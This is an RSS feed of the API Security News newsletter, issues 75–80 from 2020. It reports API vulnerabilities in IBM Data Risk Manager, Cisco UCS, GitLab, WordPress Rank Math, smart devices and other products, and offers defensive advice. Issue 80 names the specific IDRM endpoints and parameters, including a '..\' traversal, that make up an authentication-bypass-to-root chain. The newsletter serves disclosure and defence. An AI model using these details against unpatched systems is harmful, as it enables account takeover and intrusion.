					<description><![CDATA[<p>This week, API vulnerabilities have been reported in IBM and Cisco products, and some conferences and webinars related to API security are coming up soon. Vulnerability: IBM Data Risk Manager Pedro Ribeiro found a bunch of security vulnerabilities in IBM Data Risk Manager (IDRM). This is a control center that helps to locate, analyze, and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-80-api-vulnerabilities-ibm-data-risk-manager-cisco-unified-computing-system/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-80-api-vulnerabilities-ibm-data-risk-manager-cisco-unified-computing-system/">Issue 80: API vulnerabilities IBM Data Risk Manager and Cisco Unified Computing System</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, API vulnerabilities have been reported in IBM and Cisco products, and some conferences and webinars related to API security are coming up soon.</p>
<h2>Vulnerability: IBM Data Risk Manager</h2>
<p>Pedro Ribeiro found a bunch of security vulnerabilities in IBM Data Risk Manager (IDRM). This is a control center that helps to locate, analyze, and visualize data-related business risks, so something you would like to be risk-free in itself.</p>
<p>For some internal process reason, IBM refused to accept Ribeiro&#8217;s report so <a href="https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md" target="_blank" rel="noopener noreferrer">the information got published online</a> and the exploit details are now publicly available. To IBM&#8217;s credit, they did <a href="https://www.ibm.com/support/pages/node/6195705" target="_blank" rel="noopener noreferrer">release a patch</a> within hours. of this happening.</p>
<p>Ribeiro found several critical vulnerabilities in IDRM:</p>
<ul>
<li>Authentication bypass:
<ul>
<li>Lack of input validation and a logic flaw allowed  <code>GET /albatross/saml/idpSelection?id=SOMETHING&amp;userName=admin</code> to associate arbitrary session ID with any existing user without any authentication checks.</li>
<li><code>POST /albatross/user/login</code> accepted username and session ID as parameters, and if the user existed and the session ID was associated with the record, the API returned a newly generated random password for that username.</li>
<li>Combined, these flaws allowed attackers to take over any existing account, including administrator accounts.</li>
</ul>
</li>
<li>Command Injection:
<ul>
<li><code>/albatross/restAPI/v2/nmap/run/scan</code> allowed to execute <code>nmap</code> scans, including executing script files.</li>
<li><code>POST /albatross/upload/patch</code> allowed arbitrary file uploads.</li>
<li>Both of these required authentication as an administrator, but combined with the authentication bypass vulnerability, that was not a problem.</li>
</ul>
</li>
<li>Insecure default password:
<ul>
<li>This one is not REST API-related, but the virtual appliance had hardcoded SSH credentials. However, combined with the two previous API vulnerabilities, this allowed remote code execution as <code>root</code>.</li>
</ul>
</li>
<li>Arbitrary file download:
<ul>
<li><code>POST /albatross/eurekaservice/fetchLogFiles</code> did not properly validate the parameter <code>logFileNameList</code>, so by moving up the directory with <code>..\</code> attackers could download any file from the server.</li>
</ul>
</li>
</ul>
<p>All in all, pretty serious stuff.</p>
<h2>Vulnerability: Cisco Unified Computing System</h2>
<p>Cisco has patched <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucsd-mult-vulns-UNfpdW4E" target="_blank" rel="noopener noreferrer">a lot of REST API vulnerabilities in their Unified Computing System (UCS) products</a> UCS Director and UCS Director Express for Big Data.</p>
<p>Most issues were caused by insufficient validation of user-supplied input. As result, the patched vulnerabilities included, to list but a few:</p>
<ul>
<li>Unauthorized administrative access</li>
<li>Directory traversal</li>
<li>Remote code execution</li>
<li>Authentication bypass</li>
<li>Denial-of-service (DoS) attacks</li>
</ul>
<p>To make matters worse, <a href="https://www.intel.com/content/dam/www/public/us/en/documents/solution-briefs/epic-on-cisco-helping-healthcare-providers-solution-brief.pdf" target="_blank" rel="noopener noreferrer">Cisco UCS architecture is integrated in the Epic EHR</a>. There might be potential breaches lurking in the healthcare sector if the institutions don&#8217;t patch their systems quickly enough.</p>
<p>APIs need to be designed with zero trust approach in mind. All inputs need to be thoroughly defined and validated.</p>
<p>We have covered previous API security issues in Cisco products in our newsletters <a href="https://apisecurity.io/issue-30-5g-going-to-rest-breaches-in-dell-cisco-weblogic-dockerhub-justdial-ilnkp2p/" target="_blank" rel="noopener noreferrer">30</a>, <a href="https://apisecurity.io/issue-42-http-security-headers/" target="_blank" rel="noopener noreferrer">42</a>, <a href="https://apisecurity.io/issue-43-rest-api-security-testing/" target="_blank" rel="noopener noreferrer">43</a>, <a href="https://apisecurity.io/issue-46-cisco-and-facebook-patch-apis-solr-api-parameter-injection/" target="_blank" rel="noopener noreferrer">46</a>, <a href="https://apisecurity.io/issue-47-cisco-mulesoft-vulnerabilities-api-world-passes/" target="_blank" rel="noopener noreferrer">47</a>, <a href="https://apisecurity.io/issue-51-gartner-releases-full-report-api-security/" target="_blank" rel="noopener noreferrer">51</a>, <a href="https://apisecurity.io/issue-55-vulnerabilities-eidas-cisco-routers-instagram-api-program-locked/" target="_blank" rel="noopener noreferrer">55</a>, <a href="https://apisecurity.io/issue-65-vulnerabilities-at-siemens-cisco-d-link-owasp-api-security-top-10-out/" target="_blank" rel="noopener noreferrer">65</a>, and <a href="https://apisecurity.io/issue-69-vulnerabilities-in-azure-cloud-infrastructure-and-cisco-telepresence-api-fuzzing/" target="_blank" rel="noopener noreferrer">69</a>.</p>
<h2>Webinar: The Anatomy of 4 API Breaches</h2>
<p>Learning from others&#8217; mistakes is the best way to learn about security.</p>
<p>On April 30, Isabelle Mauny is hosting <a href="https://42crunch.com/webinar-anatomy-api-breaches/" target="_blank" rel="noopener noreferrer">a webinar that covers four recent high-profile API security breaches in detail</a>. She will dissect each vulnerability, how and why it happened, and what you can do to prevent similar exploits on your APIs.</p>
<p>If you ever wanted real-life examples on API security dos and don&#8217;ts, now is your chance.</p>
<h2>Conference: IIoT World 2020</h2>
<p>Conferences are all going virtual (at least the ones not getting indefinitely rescheduled or canceled).</p>
<p>Industrial IoT World 2020 will be taking place online June 30—July 1, and includes a variety of IoT topics, including security.</p>
<p>You can find the conference agenda <a href="https://iiotday.com/preliminary-agenda/" target="_blank" rel="noopener noreferrer">here</a>. Registration is free until June 8.</p>
<p>The post <a href="https://apisecurity.io/issue-80-api-vulnerabilities-ibm-data-risk-manager-cisco-unified-computing-system/">Issue 80: API vulnerabilities IBM Data Risk Manager and Cisco Unified Computing System</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 79: 1.4 million doctor records scraped using API</title>
		<link>https://apisecurity.io/issue-79-1-4-million-doctor-records-scraped-using-api/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 15 Apr 2020 22:00:06 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6806</guid>

					<description><![CDATA[<p>This week, unprotected APIs have allowed hackers to compile to put on sale a list of 1.4 million of US doctors, and GitLab has published details on the API vulnerability they recently fixed. We also have a recording of a recent API security conference talk, and an announcement of an upcoming training on OAuth and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-79-1-4-million-doctor-records-scraped-using-api/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-79-1-4-million-doctor-records-scraped-using-api/">Issue 79: 1.4 million doctor records scraped using API</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, unprotected APIs have allowed hackers to compile to put on sale a list of 1.4 million of US doctors, and GitLab has published details on the API vulnerability they recently fixed. We also have a recording of a recent API security conference talk, and an announcement of an upcoming training on OAuth and OpenID Connect.</p>
<h2>Vulnerability: findadoctor.com</h2>
<p>In healthcare sector, it is not just leaks on patient information that can pose big problems, the details of practitioners could do with securing, too, like in <a href="https://www.hackread.com/personal-data-us-doctors-sold-hacker-forum/" target="_blank" rel="noopener noreferrer">the case of findadoctor.com</a>.</p>
<p>This online service in the US does what the name says: find healthcare professionals near you. Hackers used insecure APIs behind the website <code>qa.findadoctor.com</code> to scrape information on 1.4 million doctors in the US. Naturally, they promptly put it on sale.</p>
<p><img loading="lazy" decoding="async" class="alignleft size-full wp-image-6818" src="https://apisecurity.io/wp-content/uploads/2020/04/findadoctor_records.png" alt="" width="1446" height="868" /></p>
<p>You might ask why this would be a problem, the service was already providing these details to users after all. While the information was indeed public on the site itself, the unprotected API allowed downloading all of it and making it available in a structured form. A nice little dataset to use for further attacks.</p>
<p>Lists like this are often exploited, for example, in phishing campaigns. In this particular case, email addresses were thankfully not included in the dataset, but could potentially be added using some heuristics or external sources. However, the phone numbers are there, so SMS phishing (smishing) is still very much possible.</p>
<p>Just like databases, even APIs sharing data from public domain need to be protected. To start with, establish reasonable rate limiting, authentication, and filtering by invocation source.</p>
<h2>Vulnerability: GitLab</h2>
<p><a href="https://about.gitlab.com/blog/2020/03/30/how-to-exploit-parser-differentials/" target="_blank" rel="noopener noreferrer">GitLab has posted more details</a> on the root cause of their API vulnerability we covered <a href="https://apisecurity.io/issue-77-vulnerabilities-gitlab-oauth-2-1-draft/" target="_blank" rel="noopener noreferrer">in our previous newsletter</a>.</p>
<p>In short, the vulnerability emerged out of file uploads and the differences in how the <code>gitlab-workhorse</code> and <code>gitlab-rails</code>  components were treating and parsing <code>PUT</code> and <code>POST</code> requests.</p>
<p>Good lesson on how subtle inconsistencies in implementation of the same functionality in different parts of the stack can lead to vulnerabilities.</p>
<p><img loading="lazy" decoding="async" class="alignleft size-full wp-image-6819" src="https://apisecurity.io/wp-content/uploads/2020/04/GitLab-file-upload-vulnerability.jpg" alt="" width="1185" height="727" /></p>
<h2>Conference talk: Attacking Secondary Contexts in Web Applications</h2>
<p>Sam Curry has posted <a href="https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8/edit#slide=id.p" target="_blank" rel="noopener noreferrer">the slides</a> and the video (see below) from his recent Kernelcon talk, &#8220;Attacking Secondary Contexts in Web Applications&#8221;.</p>
<p>Significant part of the presentation concentrates on turning a web application attack into an API attack, so definitely of interest for API security.</p>
<p><iframe loading="lazy" title="Attacking Secondary Contexts in Web Applications - Sam Curry" width="640" height="360" src="https://www.youtube.com/embed/hWmXEAi9z5w?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Online training: Mastering OAuth 2.0 and OpenID Connect</h2>
<p>OAuth2 and OpenID Connect have become the cornerstones of modern API, web, and mobile security. Yet a lot of developers still find them quite confusing.</p>
<p>Now that in-person training is not an option, Philippe De Ryck is offering his course on this very topic online. The next course starts on May 11, 2020. Click <a href="https://pragmaticwebsecurity.com/courses/mastering-oauth-oidc.html" target="_blank" rel="noopener noreferrer">here</a> to find more details and to enroll.</p>
<p>The post <a href="https://apisecurity.io/issue-79-1-4-million-doctor-records-scraped-using-api/">Issue 79: 1.4 million doctor records scraped using API</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 78: Vulnerabilities in WordPress Rank Math, Tapplock, and TicTocTrack</title>
		<link>https://apisecurity.io/issue-78-vulnerabilities-wordpress-rank-math-tapplock-tictoctrack/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 08 Apr 2020 22:00:49 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6786</guid>

					<description><![CDATA[<p>This week, we check out the API vulnerabilities in the WordPress Rank Math plugin, Tapplock smartlock, and TicTocTrack, another kids&#8217; smartwatch. In addition, an update to VS Code OpenAPI extension that adds static application security testing (SAST) for composite API contracts has been released. Vulnerability: WordPress Rank Math plugin A popular WordPress plugin, Rank Math, [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-78-vulnerabilities-wordpress-rank-math-tapplock-tictoctrack/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-78-vulnerabilities-wordpress-rank-math-tapplock-tictoctrack/">Issue 78: Vulnerabilities in WordPress Rank Math, Tapplock, and TicTocTrack</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the API vulnerabilities in the WordPress Rank Math plugin, Tapplock smartlock, and TicTocTrack, another kids&#8217; smartwatch.</p>
<p>In addition, an update to VS Code OpenAPI extension that adds static application security testing (SAST) for composite API contracts has been released.</p>
<h2>Vulnerability: WordPress Rank Math plugin</h2>
<p>A popular WordPress plugin, Rank Math, <a href="https://www.wordfence.com/blog/2020/03/critical-vulnerabilities-affecting-over-200000-sites-patched-in-rank-math-seo-plugin/" target="_blank" rel="noopener noreferrer">had a critical API security vulnerability</a>. This plugin makes search engine optimization (SEO) of WordPress sites easier, and it has over 200 000 installs.</p>
<p>One of the functions of the plugin was to update metadata on WordPress post. For this, the plugin registered a REST-API endpoint, <code>rankmath/v1/updateMeta</code>. This endpoint had no authorization checks and so no restrictions for its use.</p>
<p>This allowed attackers to modify various metadata of not just WordPress posts, but also elsewhere in the WordPress deployment. The most critical scenario allowed attackers to make changes to the <code>users</code> table. Attackers could disable or modify any existing users, and even create their own administrative accounts for takeover. Attackers could also create redirects, opening the door for further attacks through malicious websites.</p>
<p>Luckily the vulnerability has already been fixed. Lessons learned from this one:</p>
<ul>
<li>APIs should always have authentication and authorization checks.</li>
<li>The scope of using an API usage should be limited to cover only the bare minimum of what is required for the business operations.</li>
<li>Input should always be checked to enforce only the scenarios for which the API is supposed to be used.</li>
</ul>
<h2>Vulnerability: Tapplock</h2>
<p>US Federal Trade Commission (FTC) has reached a settlement with the smartlock manufacturer Tapplock. The company had been marketing their lock as &#8220;unbreakable&#8221; when in fact it had pretty glaring security issues. These also included some API vulnerabilities:</p>
<ul>
<li><a href="https://apisecurity.io/encyclopedia/content/oasv3/security/transport/transport.htm" target="_blank" rel="noopener noreferrer"><strong>Transport</strong></a>: Communications between the Tapplock app and API server were <em>not</em> using HTTPS but unencrypted HTTP, and thus susceptible to snooping and man-in-the-middle (MITM) attacks.</li>
<li><strong>Broken Object Level Authorization (<a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">BOLA, aka IDOR</a>)</strong>: After successfully logging in, a user could then access the account of another user without being redirected to the login page. This gave access to all personal information of the other user, including &#8220;usernames, e-mail addresses, profile photos, location history, and precise geolocation of smart locks&#8221;.</li>
</ul>
<p>See the full <a href="https://www.ftc.gov/system/files/documents/cases/192_3011_tapplock_complaint.pdf" target="_blank" rel="noopener noreferrer">FTC document</a> or a summary from <a href="https://www.theregister.co.uk/2020/04/06/tapplock_ftc/" target="_blank" rel="noopener noreferrer">The Register</a>. We have previously covered vulnerabilities in smartlocks in our issues <a href="https://apisecurity.io/issue-38-cracked-smartlocks-x-frame-options-standards-gaining-adoption/" target="_blank" rel="noopener noreferrer">38</a> and <a href="https://apisecurity.io/issue-45-hacked-dating-apps-smartlocks-cloud-egregious-11/" target="_blank" rel="noopener noreferrer">45</a>.</p>
<h2>Vulnerability: TicTocTrack</h2>
<p>We covered a vulnerability in TicTocTrack, an Australian GPS-enabled smartwatch for kids, about a year ago in <a href="https://apisecurity.io/issue-27-mycar-vulnerability-serverless-iot-api-security/" target="_blank" rel="noopener noreferrer">issue 27</a>. Now, Gordon Beeming has found that <a href="https://lazy-developer.xyz/blogs/dev/2020/3/the-importance-of-regression-testing-and-real-world-security-consequences" target="_blank" rel="noopener noreferrer">the system had a recent regression and the vulnerability was re-introduced</a>.</p>
<p>This BOLA/IDOR issue allowed any user to get data and gain control over any other TicTocTrack smartwatch. That obviously endangered both privacy and the physical security of children using the devices. As serious as they come.</p>
<p>With product teams iterating on the versions of their systems, you cannot treat security as a one-time review or one-time fix process. Security vulnerabilities may be introduced or re-introduced on any code change. This is especially dangerous when data access interfaces are used like <a href="https://www.odata.org/" target="_blank" rel="noopener noreferrer">OData</a> (Open Data Protocol) in this particular case.</p>
<p>Security needs to shift left and be a part of API design, development, and testing, iterating as the code is iterated on.</p>
<h2>Tools: SAST for composite OpenAPI files in VS Code</h2>
<p>Microsoft Visual Studio Code (VS Code) has a popular OpenAPI extension, <a href="https://marketplace.visualstudio.com/items?itemName=42Crunch.vscode-openapi" target="_blank" rel="noopener noreferrer">OpenAPI (Swagger) Editor</a>, that helps create, edit, and check the security of REST API definitions.</p>
<p>This week, the extension has been updated, and it now enables developers to perform API Contract Security Audit — a SAST analysis — even on composite API contracts: API definitions that reference parts like payload definition schemas from external files with <code>$ref</code> references.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-6787 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/04/composite_openapi_file_security_audit_960.gif" alt="" width="960" height="540" /></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-78-vulnerabilities-wordpress-rank-math-tapplock-tictoctrack/">Issue 78: Vulnerabilities in WordPress Rank Math, Tapplock, and TicTocTrack</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 77: Vulnerabilities in GitLab, OAuth 2.1 draft is out</title>
		<link>https://apisecurity.io/issue-77-vulnerabilities-gitlab-oauth-2-1-draft/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 01 Apr 2020 22:00:45 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6770</guid>

					<description><![CDATA[<p>This week, GitLab has fixed several vulnerabilities, including API vulnerabilities, and the draft for OAuth 2.1 has been released. If you find yourself stuck at home with extra time in your hands, why not check out the free course on web security that Stanford University is offering? Vulnerability: GitLab GitLab has released a new security [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-77-vulnerabilities-gitlab-oauth-2-1-draft/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-77-vulnerabilities-gitlab-oauth-2-1-draft/">Issue 77: Vulnerabilities in GitLab, OAuth 2.1 draft is out</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, GitLab has fixed several vulnerabilities, including API vulnerabilities, and the draft for OAuth 2.1 has been released.</p>
<p>If you find yourself stuck at home with extra time in your hands, why not check out the free course on web security that Stanford University is offering?</p>
<h2>Vulnerability: GitLab</h2>
<p><a href="https://about.gitlab.com/releases/2020/03/26/security-release-12-dot-9-dot-1-released/" target="_blank" rel="noopener noreferrer">GitLab has released a new security release</a> that fixes — among other things — a couple API vulnerabilities:</p>
<ul>
<li>Insufficient access verification in the API allowed external users to create personal snippets.</li>
<li>The GraphQL API leaked namespaces of private projects through GitLab issues that were opened in a public project and then moved to the private one.</li>
</ul>
<p>The details on both are bit skimpy, but hopefully more details will be available when CVEs are assigned.</p>
<h2>Standards: OAuth 2.1</h2>
<p><a href="https://tools.ietf.org/html/draft-parecki-oauth-v2-1-01" target="_blank" rel="noopener noreferrer">The draft for OAuth 2.1 Authorization Framework has been published</a>. It is not radically different from OAuth 2.0, but rather incorporates the latest security best practices. (Aaron had <a href="https://aaronparecki.com/2019/12/12/21/its-time-for-oauth-2-dot-1" target="_blank" rel="noopener noreferrer">a great blog post</a> explaining the rationale behind the update.)</p>
<p>The main changes to highlight are:</p>
<ul>
<li>Proof Key for Code Exchange (PKCE) is now required for authorization code grant.</li>
<li>Exact matching is required for redirect URIs.</li>
<li>Refresh tokens are now sender-constrained or one-time use only.</li>
<li>Implicit grant and Resource Owner Password Credentials grant have been removed.</li>
<li>Bearer tokens in query parameters are no longer allowed.</li>
</ul>
<h2>Education: Stanford CS 253 Web Security</h2>
<p>Stanford University has released their <a href="https://web.stanford.edu/class/cs253/" target="_blank" rel="noopener noreferrer">course on Web Security from last fall accessible for free</a>. The course resources include everything from videos and course slides to reading material and course assignments.</p>
<p>The covered topics include:</p>
<ul>
<li>Principles of web security</li>
<li>Attacks and countermeasures</li>
<li>Browser security model</li>
<li>Web app vulnerabilities</li>
<li>Injections</li>
<li>Denial-of-service (DoS)</li>
<li>TLS attacks</li>
<li>Privacy</li>
<li>Fingerprinting</li>
<li>Same-origin policy</li>
<li>Cross-site scripting (XSS)</li>
<li>Authentication</li>
<li>JavaScript security</li>
<li>Emerging threats</li>
<li>Defense-in-depth</li>
<li>Techniques for writing secure code</li>
</ul>
<p>For hands-on exercises, the course offers projects on writing security exploits, defending insecure web apps, and implementing emerging web standards.</p>
<p>The post <a href="https://apisecurity.io/issue-77-vulnerabilities-gitlab-oauth-2-1-draft/">Issue 77: Vulnerabilities in GitLab, OAuth 2.1 draft is out</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 76: 3rd-party API leaks 8 million shopping records</title>
		<link>https://apisecurity.io/issue-76-3rd-party-api-leaks-8-mln-shopping-records/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 25 Mar 2020 22:00:49 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6752</guid>

					<description><![CDATA[<p>This week, new security issues have been reported in US election app, Voatz, and an API vendor has leaked 8 million shopping records in UK. In addition, ESG have shared some of their findings on API security and DevSecOps, and there is a new API security extension for Azure Pipelines. Vulnerability: Voatz We have already [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-76-3rd-party-api-leaks-8-mln-shopping-records/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-76-3rd-party-api-leaks-8-mln-shopping-records/">Issue 76: 3rd-party API leaks 8 million shopping records</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, new security issues have been reported in US election app, Voatz, and an API vendor has leaked 8 million shopping records in UK. In addition, ESG have shared some of their findings on API security and DevSecOps, and there is a new API security extension for Azure Pipelines.</p>
<h2>Vulnerability: Voatz</h2>
<p>We have already covered vulnerabilities found in a previous MIT security research on the US election app Voatz <a href="https://apisecurity.io/issue-72-vulnerabilities-in-wordpress-themerex-addons-and-voatz-facebook-postmortem-jwt-talks-openapi-specification-3-0-3/" target="_blank" rel="noopener noreferrer">in our newsletter issue 72</a>. Now, another security research on the app has also been published.</p>
<p><a href="https://blog.trailofbits.com/2020/03/13/our-full-report-on-the-voatz-mobile-voting-platform/" target="_blank" rel="noopener noreferrer">Trail of Bits was hired to do the new security research jointly by Voatz itself and Tusk Philanthropies</a>. This meant that they got access to most of the source code. This enabled them to do a fuller analysis than previous security researchers who did not have that level of co-operation. As a result, they found even more issues, including some that are API-related:</p>
<ul>
<li>Sensitive API credentials stored in Git repositories</li>
<li>Non-standard cryptography</li>
<li>Reliance on unvalidated data provided by the clients</li>
</ul>
<p>Unfortunately, even Trail of Bits still did not receive a full live testing environment for their research. However, it is good to see that the vendor is starting to collaborate with security researchers.</p>
<p>Obviously, the recommendations that Trail of Bits make in their report — like using only standard encryption mechanisms, not storing API keys and secrets in the source code, and validating all input — apply to APIs in general.</p>
<h2>Vulnerability: 8 million shopping records</h2>
<p>On the dangers of exposing your data through APIs to 3rd parties: <a href="https://www.comparitech.com/blog/information-security/uk-shopper-records-exposed/" target="_blank" rel="noopener noreferrer">Comparitech found an unprotected database leaking 8 million shopping records</a> from big names in European e-commerce, like Amazon UK, Ebay, Shopify, PayPal, and Stripe. The leaky database belonged to an API vendor that assisted merchants in aggregating sales and refund data from multiple marketplaces, and calculating value-added tax (VAT) for cross border sales in the EU.</p>
<p>No passwords or full payment information was included in the leaked data, but personal details like names, email and shipping addresses, purchases, and the last four digits of credit card numbers were. The full impact is not known, nor if the data has gotten into wrong hands. The database has been taken down.</p>
<p>Each time you are passing sensitive data to 3rd party vendors through APIs, are you calculating the risk of the 3rd-party aggregating and storing that data, and all of it potentially leaking? If you have to do it, what can you do to mitigate it?</p>
<p>We recommend narrowing down the shared information to bare minimum and redacting any personal customer data that is not absolutely necessary for the operation. For example, in this particular case, we would guess that calculating VAT  would not require customer names, their exact addresses, or phone and credit card numbers.</p>
<h2>Analysts: ESG on API security and DevSecOps</h2>
<p><span id="ember1677" class="ember-view">At the RSA Conference last month, Doug Cahill from ESG Global shared some findings from his recent research: </span></p>
<ul>
<li><span id="ember1677" class="ember-view">92% of surveyed enterprises are concerned about losing data through insecure APIs.</span></li>
<li><span id="ember1677" class="ember-view">44% are planning or evaluating implementing DevSecOps.</span></li>
<li><span id="ember1677" class="ember-view">Securing the API economy requires a full stack, full lifecycle approach.</span></li>
</ul>
<p><img loading="lazy" decoding="async" class="size-full wp-image-6753 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/03/Doug_Cahill_RSAC_20200227_085952.jpg" alt="" width="800" height="600" /><a id="ember1681" class="feed-shared-text-view__hyperlink ember-view" tabindex="0" href="https://lnkd.in/gR6cCVx" target="_blank" rel="noopener noreferrer"></a><span id="ember1685" class="ember-view"> </span></p>
<p>For more details, see <a href="https://www.esg-global.com/coverage/cybersecurity" target="_blank" rel="noopener noreferrer">ESG Cybersecurity page</a>.</p>
<h2>Tools: REST API Static Security Testing in Azure Pipelines</h2>
<p>REST API security works best when it is &#8220;shifted left&#8221; and done by design. Hence, a lot of companies are doing just that and including the security tests into their CI/CD pipelines.</p>
<p>42Crunch has just released <a href="https://marketplace.visualstudio.com/items?itemName=42Crunch.cicd" target="_blank" rel="noopener noreferrer">an extension for Azure DevOps</a> that adds OpenAPI file discovery and static analysis (SAST) to the CI/CD pipeline.</p>
<p><img loading="lazy" decoding="async" class="size-medium alignnone" src="https://42crunch.gallerycdn.vsassets.io/extensions/42crunch/cicd/1.0.31/1584628482839/images/setting-up-42crunch-azure-pipelines-task.gif" width="960" height="540" /></p>
<p>The post <a href="https://apisecurity.io/issue-76-3rd-party-api-leaks-8-mln-shopping-records/">Issue 76: 3rd-party API leaks 8 million shopping records</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 75: 98% of IoT traffic unencrypted, API DevSecOps in Azure Pipelines</title>
		<link>https://apisecurity.io/issue-75-98-iot-traffic-unencrypted-api-devsecops-azure-pipelines/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 18 Mar 2020 22:00:30 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6737</guid>

					<description><![CDATA[<p>This week, the state of security in Zyxel&#8217;s management console as well as in the field of IoT leaves room for improvement. Meanwhile, on the presentation front, we have an upcoming webinar on API DevSecOps in Azure Pipelines, and recordings from BSides SF 2020 are out. Vulnerability: Zyxel Cloud CNM SecuManager Pierre Kim and Alexandre [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-75-98-iot-traffic-unencrypted-api-devsecops-azure-pipelines/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-75-98-iot-traffic-unencrypted-api-devsecops-azure-pipelines/">Issue 75: 98% of IoT traffic unencrypted, API DevSecOps in Azure Pipelines</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, the state of security in Zyxel&#8217;s management console as well as in the field of IoT leaves room for improvement.</p>
<p>Meanwhile, on the presentation front, we have an upcoming webinar on API DevSecOps in Azure Pipelines, and recordings from BSides SF 2020 are out.</p>
<h2>Vulnerability: Zyxel Cloud CNM SecuManager</h2>
<p>Pierre Kim and Alexandre Torres have reported 16 <a href="https://pierrekim.github.io/blog/2020-03-09-zyxel-secumanager-0day-vulnerabilities.html" target="_blank" rel="noopener noreferrer">critical, unpatched security vulnerabilities with Zyxel Cloud CNM SecuManager</a> network management software. This product provides an integrated console for monitoring and managing Zyxel security gateways, so you would assume it to be secure as well</p>
<p>Some of the vulnerabilities Kim and Torres found include API vulnerabilities, such as hardcoded API secrets and keys (<a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm">OWASP API2:2019 — Broken user authentication</a>), and backdoor administrative APIs (<a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization.htm">OWASP API5:2019 — Broken function level authorization</a>).</p>
<p>According to Kim and Torres:</p>
<blockquote><p><em>&#8220;The attack surface is very large and many different stacks are being used making it very interesting. Furthermore, some daemons are running as root and are reachable from the WAN. Also, there is no firewall by default.&#8221;</em></p></blockquote>
<p>There is no patch or vendor reaction, so the recommendation is to stop using the product.</p>
<h2>Research: The poor state of IoT security</h2>
<p>IoT continues to heavily rely on devices being in a &#8220;safe&#8221; network. For example, among other issues, the <a href="https://start.paloaltonetworks.com/unit-42-iot-threat-report" target="_blank" rel="noopener noreferrer">2020 Unit 42 IoT Threat Report</a> by Palo Alto Networks found that 98% of all IoT device traffic is not even encrypted.</p>
<p>For their report, Unit 42 analyzed 1.2 million IoT devices across enterprise IT and healthcare organizations in the United States to identify the top IoT threats and provide recommendations how to mitigate them. This means that the report gives a very good impression of the lay of the land in IoT.</p>
<p>Since APIs are an integral part of the IoT world, the report is very valuable from the API security perspective.</p>
<h2>Webinar: API DevSecOps with Azure DevOps</h2>
